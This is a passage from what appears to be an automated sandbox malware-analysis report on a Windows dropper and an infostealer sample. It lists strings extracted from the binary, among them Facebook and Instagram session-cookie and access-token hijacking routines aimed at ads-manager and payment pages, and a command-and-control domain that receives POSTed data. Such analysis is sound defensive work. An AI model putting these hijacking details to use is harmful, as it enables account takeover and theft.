text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe | String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmp | String found in binary or memory: http://www.youtube.com//a equals www.youtube.com (Youtube)
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmp | String found in binary or memory: http://www.youtube.comz/ equals www.youtube.com (Youtube)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: 84cfba021a5a6662.xyz
Source: unknown | HTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 84Host: 84cfba021a5a6662.xyz
Source: 6852B33702F6B3BD.exe, 00000005.00000002.289422992.0000000000848000.00000004.00000020.sdmp | String found in binary or memory: http://84CFBA021A5A6662.xyz/g
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383740567.0000000003CA0000.00000004.00000001.sdmp | String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/ddd
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383740567.0000000003CA0000.00000004.00000001.sdmp | String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/g
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383740567.0000000003CA0000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.289445112.0000000000865000.00000004.00000020.sdmp | String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/w
Source: 6852B33702F6B3BD.exe, 00000005.00000002.289445112.0000000000865000.00000004.00000020.sdmp | String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/w%
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261142777.0000000000811000.00000004.00000020.sdmp | String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/w&
Source: 6852B33702F6B3BD.exe, 00000005.00000002.289494170.0000000000893000.00000004.00000020.sdmp | String found in binary or memory: http://84CFBA021A5A6662.xyz/info_old/wN
Source: 6852B33702F6B3BD.exe, 00000005.00000002.289422992.0000000000848000.00000004.00000020.sdmp | String found in binary or memory: http://84CFBA021A5A6662.xyz/xet(
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261158287.000000000081C000.00000004.00000020.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.289422992.0000000000848000.00000004.00000020.sdmp | String found in binary or memory: http://84cfba021a5a6662.xyz/
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261158287.000000000081C000.00000004.00000020.sdmp | String found in binary or memory: http://84cfba021a5a6662.xyz/i
Source: FileSetup-v17.04.41.exe, 00000001.00000002.261142777.0000000000811000.00000004.00000020.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.289422992.0000000000848000.00000004.00000020.sdmp | String found in binary or memory: http://84cfba021a5a6662.xyz/info_old/w
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383694906.0000000003CBF000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeIns3)
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305023752.0000000003CBF000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: 6852B33702F6B3BD.exe, 00000004.00000003.305023752.0000000003CBF000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe0)
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 6852B33702F6B3BD.exe, 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmp | String found in binary or memory: http://clients2.google.com/service/update2/crx
Source: 6852B33702F6B3BD.exe, 00000005.00000003.278156648.0000000003DDE000.00000004.00000001.sdmp | String found in binary or memory: http://clients2.google.com/service/update2/crxE&
Source: FileSetup-v17.04.41.exe | String found in binary or memory: http://config.i.duba.net/lminstall/%d.json?time=%d
Source: FileSetup-v17.04.41.exe | String found in binary or memory: http://config.i.duba.net/lminstall/%d.json?time=%dcheckinstallSOFTWARE
Source: 1611946678493.exe.4.dr | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1611946678493.exe.4.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1611946678493.exe.4.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: FileSetup-v17.04.41.exe | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: FileSetup-v17.04.41.exe | String found in binary or memory: http://curl.haxx.se/docs/http-cookies.html
Source: FileSetup-v17.04.41.exe | String found in binary or memory: http://curl.haxx.se/docs/http-cookies.html#
Source: 6852B33702F6B3BD.exe | String found in binary or memory: http://docs.google.com/
Source: 6852B33702F6B3BD.exe, 00000004.00000003.383784768.0000000002227000.00000004.00000040.sdmp | String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 6852B33702F6B3BD.exe | String found in binary or memory: http://drive.google.com/
Source: 6852B33702F6B3BD.exe, 00000004.00000003.304868433.0000000003CBF000.00000004.00000001.sdmp | String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: FileSetup-v17.04.41.exe | String found in binary or memory: http://infoc0.duba.net/c/
Source: 1611946678493.exe.4.dr | String found in binary or memory: http://ocsp.comodoca.com0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0:
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0B
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0E
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0F
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0I
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0K
Source: ecvAA35.tmp.11.dr | String found in binary or memory: http://ocsp.digicert.com0M
Source: 6852B33702F6B3BD.exe, 00000004.00000002.386927349.000000000346C000.00000004.00000001.sdmp, 6852B33702F6B3BD.exe, 00000005.00000002.293226984.00000000036AC000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0P
